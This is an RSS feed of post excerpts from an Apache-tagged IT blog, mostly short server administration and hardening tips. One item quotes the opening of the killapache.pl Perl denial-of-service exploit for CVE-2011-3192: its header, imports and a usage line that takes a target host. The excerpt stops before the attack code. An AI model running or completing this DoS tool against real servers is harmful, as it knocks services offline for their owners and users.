<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GO IT WORLD &#124; IT TECH &#124; IT NEWS &#187; apache</title>
	<atom:link href="http://www.goitworld.com/tag/apache/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.goitworld.com</link>
	<description>goitworld.com</description>
	<lastBuildDate>Tue, 10 Jan 2012 10:03:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.2</generator>
		<item>
		<title>iis7 and apache share port 80 in windows2008</title>
		<link>http://www.goitworld.com/iis7-and-apache-share-port-80-in-windows2008/</link>
		<comments>http://www.goitworld.com/iis7-and-apache-share-port-80-in-windows2008/#comments</comments>
		<pubDate>Fri, 16 Sep 2011 05:34:14 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Apache Server]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[iis]]></category>
		<category><![CDATA[netsh]]></category>
		<category><![CDATA[win2008]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/iis7-and-apache-share-port-80-in-windows2008/</guid>
		<description><![CDATA[<p style="float: right;margin: 4px;">


</p><p>1) Added or make sure your machine has two or more ip&#8217;s   <br />2) Open a command prompt    <br />3) Type netsh    <br />4) Type http    <br />5) Type sho iplisten. It should be blank    <br />6) Type add iplisten ipaddress=192.168.0.90    <br />You should get IP address successfully added    <br />7) Type sho iplisten again    <br />It should sho 192.168.0.90 in the list    <br />8) Type exit to get out of netsh    <br />9) Type type netstat -an. See if you notice 192.168.0.90:80 in the list. If you see 0.0.0.0:80, do an iisreset    <br />10) Download&#8230; <a href="http://www.goitworld.com/iis7-and-apache-share-port-80-in-windows2008/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/iis7-and-apache-share-port-80-in-windows2008/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fix handling of byte-range requests to use less memory for apache2</title>
		<link>http://www.goitworld.com/fix-handling-of-byte-range-requests-to-use-less-memory-for-apache2/</link>
		<comments>http://www.goitworld.com/fix-handling-of-byte-range-requests-to-use-less-memory-for-apache2/#comments</comments>
		<pubDate>Wed, 31 Aug 2011 10:25:00 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[byte-range]]></category>
		<category><![CDATA[less memory]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/fix-handling-of-byte-range-requests-to-use-less-memory-for-apache2/</guid>
		<description><![CDATA[<p>The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the release of version 2.2.20 of the Apache HTTP Server (&#34;Apache&#34;). This version of Apache is principally a security and bug fix release: </p>
<ul>
<li>SECURITY: <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192">CVE-2011-3192</a> (cve.mitre.org) core: Fix handling of byte-range requests to use less memory, to avoid denial of service. If the sum of all ranges in a request is larger than the original file, ignore the ranges and send the complete file. PR 51714. </li>
</ul>
<p>We consider this release to be the best version of Apache available, and encourage users&#8230; <a href="http://www.goitworld.com/fix-handling-of-byte-range-requests-to-use-less-memory-for-apache2/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/fix-handling-of-byte-range-requests-to-use-less-memory-for-apache2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Apache httpd Remote Denial of Service memory exhaustion</title>
		<link>http://www.goitworld.com/apache-httpd-remote-denial-of-service/</link>
		<comments>http://www.goitworld.com/apache-httpd-remote-denial-of-service/#comments</comments>
		<pubDate>Thu, 25 Aug 2011 07:07:16 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[httpd]]></category>
		<category><![CDATA[memory exhaustion]]></category>
		<category><![CDATA[remote denial of service]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/apache-httpd-remote-denial-of-service/</guid>
		<description><![CDATA[<p>&#160;&#160;&#160;&#160;&#160;&#160;&#160; Publish Time:08-25-2011 </p>
<p>&#160;&#160;&#160;&#160;&#160;&#160;&#160; Exploit method:</p>
<blockquote><p>#Apache httpd Remote Denial of Service (memory exhaustion)     <br />#By Kingcope      <br />#Year 2011      <br />#      <br /># Will result in swapping memory to filesystem on the remote side      <br /># plus killing of processes when running out of swap space.      <br /># Remote System becomes unstable.      <br />#</p>
<p>use IO::Socket;     <br />use Parallel::ForkManager;</p>
<p>sub usage {     <br />&#160;&#160;&#160; print &#34;Apache Remote Denial of Service (memory exhaustion)\n&#34;;      <br />&#160;&#160;&#160; print &#34;by Kingcope\n&#34;;      <br />&#160;&#160;&#160; print &#34;usage: perl killapache.pl &#60;host&#62; [numforks]\n&#34;;      <br />&#160;&#160;&#160; print &#34;example: perl killapache.pl www.example.com 50\n&#34;;      <br />}</p>
<p>sub killapache {</p></blockquote><p>&#8230; <a href="http://www.goitworld.com/apache-httpd-remote-denial-of-service/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/apache-httpd-remote-denial-of-service/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Disable php execute of special directory of nginx</title>
		<link>http://www.goitworld.com/disable-php-execute-of-special-directory-of-nginx/</link>
		<comments>http://www.goitworld.com/disable-php-execute-of-special-directory-of-nginx/#comments</comments>
		<pubDate>Wed, 01 Jun 2011 08:38:47 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Nginx Server]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[nginx]]></category>
		<category><![CDATA[php execute privileges]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/disable-php-execute-of-special-directory-of-nginx/</guid>
		<description><![CDATA[<p>If your web server is apache ,you can add follow line:</p>
<blockquote><p>&#60;Directory /website/attachments&#62;   <br />php_flag engine off    <br />&#60;/Directory&#62;</p></blockquote>
<p>We want disable upload directory php execute privileges on nginx,It’s so simple</p>
<blockquote><p>location /upload/ {     <br />location ~ .*\.(php)?$      <br />{      <br />deny all;       <br />}      <br />}</p>
</blockquote>
<p>limit more directory</p>
<blockquote><p>location ~* ^/(upload&#124;images)/.*\.(php&#124;php5)$     <br />{      <br />deny all;      <br />}</p>
</blockquote>
<p>If your web server is lighthttpd you can</p>
<blockquote><p>$HTTP[&#34;url&#34;] =~ &#34;^/(forumdata&#124;templates&#124;customavatars?)/&#34; {     <br />fastcgi.server = ()      <br />}      <br />Apache:      <br />&#60;Location &#34;/forumdata&#34;&#62;      <br />php_admin_flag engine off      <br />Options -ExecCGI      <br />AddType text/plain .html .htm .shtml .php      <br />&#60;/Location&#62;</p>
</blockquote>
<p>Hope it will help you.</p>
]]></description>
		<wfw:commentRss>http://www.goitworld.com/disable-php-execute-of-special-directory-of-nginx/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Tuning LAMP systems, Part 1</title>
		<link>http://www.goitworld.com/tuning-lamp-systems-part-1/</link>
		<comments>http://www.goitworld.com/tuning-lamp-systems-part-1/#comments</comments>
		<pubDate>Thu, 18 Nov 2010 05:33:54 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Apache Server]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[lamp]]></category>
		<category><![CDATA[tuning]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/tuning-lamp-systems-part-1/</guid>
		<description><![CDATA[<p>Linux, Apache, MySQL and PHP (or Perl) is the basis for many Web applications &#8211; from to-do list to blog, then e-commerce site.&#160; WordPress and Pligg are two high-capacity Web site to support a common package.&#160; This architecture referred to as LAMP.&#160; Almost every Linux release contains Apache, MySQL, PHP and Perl, so installing LAMP software is very easy.
</p><p>Install the misleading simplicity of the software run smoothly on their own, but it is not the case.&#160; Finally, application load will exceed the set comes with back-end server processing power, application performance will be reduced.&#160; LAMP installation requires constant monitoring,&#8230; <a href="http://www.goitworld.com/tuning-lamp-systems-part-1/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/tuning-lamp-systems-part-1/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to disable php exec privilege for spetical directory of apache and nginx</title>
		<link>http://www.goitworld.com/how-to-disable-php-executive-privileges-for-spetical-directory-of-apache-and-nginx/</link>
		<comments>http://www.goitworld.com/how-to-disable-php-executive-privileges-for-spetical-directory-of-apache-and-nginx/#comments</comments>
		<pubDate>Fri, 05 Nov 2010 07:33:45 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[disable exec privilege]]></category>
		<category><![CDATA[nginx]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/how-to-disable-php-executive-privileges-for-spetical-directory-of-apache-and-nginx/</guid>
		<description><![CDATA[<p>Disable php executive privileges for apache:</p>
<pre><strong>   &#60;Directory /website/upload&#62;
        php_flag engine off
   &#60;/Directory&#62;</strong></pre>
<pre>&#160;</pre>
<pre>Disable php executive privileges for nginx:</pre>
<pre>&#160;</pre>
<p>&#160;&#160;&#160;&#160;&#160; location ~ ^/upload/.*\.(php&#124;php5)$<br />
  <br />&#160;&#160;&#160;&#160; {</p>
<p>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; deny all;</p>
<p>&#160;&#160;&#160;&#160; } </p>
]]></description>
		<wfw:commentRss>http://www.goitworld.com/how-to-disable-php-executive-privileges-for-spetical-directory-of-apache-and-nginx/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Apache Supports Multiple SSL on Single IP Address</title>
		<link>http://www.goitworld.com/apache-supports-multiple-ssl-on-single-ip-address/</link>
		<comments>http://www.goitworld.com/apache-supports-multiple-ssl-on-single-ip-address/#comments</comments>
		<pubDate>Mon, 15 Mar 2010 12:46:47 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Apache Server]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[multiple ssl]]></category>
		<category><![CDATA[single ip address]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/apache-supports-multiple-ssl-on-single-ip-address/</guid>
		<description><![CDATA[<p>With the release of Apache 2.2.12, we can now configure multiple SSL sites in one IP address. It is available of you have Server Name Indication (SNI) extension for OpenSSL. Visit TechRepublic’s post on “<a href="http://blogs.techrepublic.com.com/opensource/?p=987">Configure Apache to support multiple SSL sites on a single IP address</a>” for details and vhost sample configuration. And for complete reference please refer to this page “<a href="http://wiki.apache.org/httpd/NameBasedSSLVHostsWithSNI">SSL with Virtual Hosts Using SNI</a>” and <a href="http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslstrictsnivhostcheck">Apache mod_ssl documentation</a>.</p>
<p>We’ll try this on our server and hopefully offer this to our shared hosting clients who wants SSL but not interested in paying extra for a&#8230; <a href="http://www.goitworld.com/apache-supports-multiple-ssl-on-single-ip-address/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/apache-supports-multiple-ssl-on-single-ip-address/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Apache Now Supports Multiple SSL on Single IP Address</title>
		<link>http://www.goitworld.com/apache-now-supports-multiple-ssl-on-single-ip-address/</link>
		<comments>http://www.goitworld.com/apache-now-supports-multiple-ssl-on-single-ip-address/#comments</comments>
		<pubDate>Fri, 12 Mar 2010 11:34:43 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Apache Server]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[ssl]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/apache-now-supports-multiple-ssl-on-single-ip-address/</guid>
		<description><![CDATA[<p>With the release of <strong>Apache</strong> 2.2.12, we can now configure <strong>multiple SSL sites</strong> in one IP address. It is available of you have Server Name Indication (SNI) extension for OpenSSL. Visit TechRepublic’s post on “<a href="http://blogs.techrepublic.com.com/opensource/?p=987">Configure Apache to support multiple SSL sites on a single IP address</a>” for details and vhost sample configuration. And for complete reference please refer to this page “<a href="http://wiki.apache.org/httpd/NameBasedSSLVHostsWithSNI">SSL with Virtual Hosts Using SNI</a>” and <a href="http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslstrictsnivhostcheck">Apache mod_ssl documentation</a>.</p>
<p>We’ll try this on our server and hopefully offer this to our shared hosting clients who wants SSL but not interested in paying extra for a&#8230; <a href="http://www.goitworld.com/apache-now-supports-multiple-ssl-on-single-ip-address/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/apache-now-supports-multiple-ssl-on-single-ip-address/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Apache KeepAlive Timeout Tunning</title>
		<link>http://www.goitworld.com/apache-keepalive-timeout-tunning/</link>
		<comments>http://www.goitworld.com/apache-keepalive-timeout-tunning/#comments</comments>
		<pubDate>Mon, 22 Feb 2010 12:01:59 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Apache Server]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[keepalive]]></category>
		<category><![CDATA[tunning]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/apache-keepalive-timeout-tunning/</guid>
		<description><![CDATA[<p>Many of our readers are asking what KeepAliveTimeout setting should be used for Apache config. We usually select 2 to 5 seconds as it provides best performance for sites with medium visitors and prefer to use Nginx or any other front-end proxy to better manage thousands of multiple concurrent users.</p>
]]></description>
		<wfw:commentRss>http://www.goitworld.com/apache-keepalive-timeout-tunning/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How To Close Etag &amp; Last-Modified</title>
		<link>http://www.goitworld.com/how-to-close-etag-last-modified/</link>
		<comments>http://www.goitworld.com/how-to-close-etag-last-modified/#comments</comments>
		<pubDate>Mon, 30 Nov 2009 08:29:33 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Apache Server]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[etag]]></category>
		<category><![CDATA[last-modified]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/how-to-close-etag-last-modified/</guid>
		<description><![CDATA[<p>Close Etag for Apache:</p>
<p>FileETag none</p>
<p>If you want to close Last-Modified keyword, you need load header module and modified httpd.conf.</p>
<p>LoadModule headers_module modules/mod_headers.so</p>
<p>&#60;FilesMatch &#34;\.(gif&#124;jpg&#124;png)&#34;&#62;   <br />Header unset Last-Modified    <br />&#60;/FilesMatch&#62;</p>
]]></description>
		<wfw:commentRss>http://www.goitworld.com/how-to-close-etag-last-modified/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

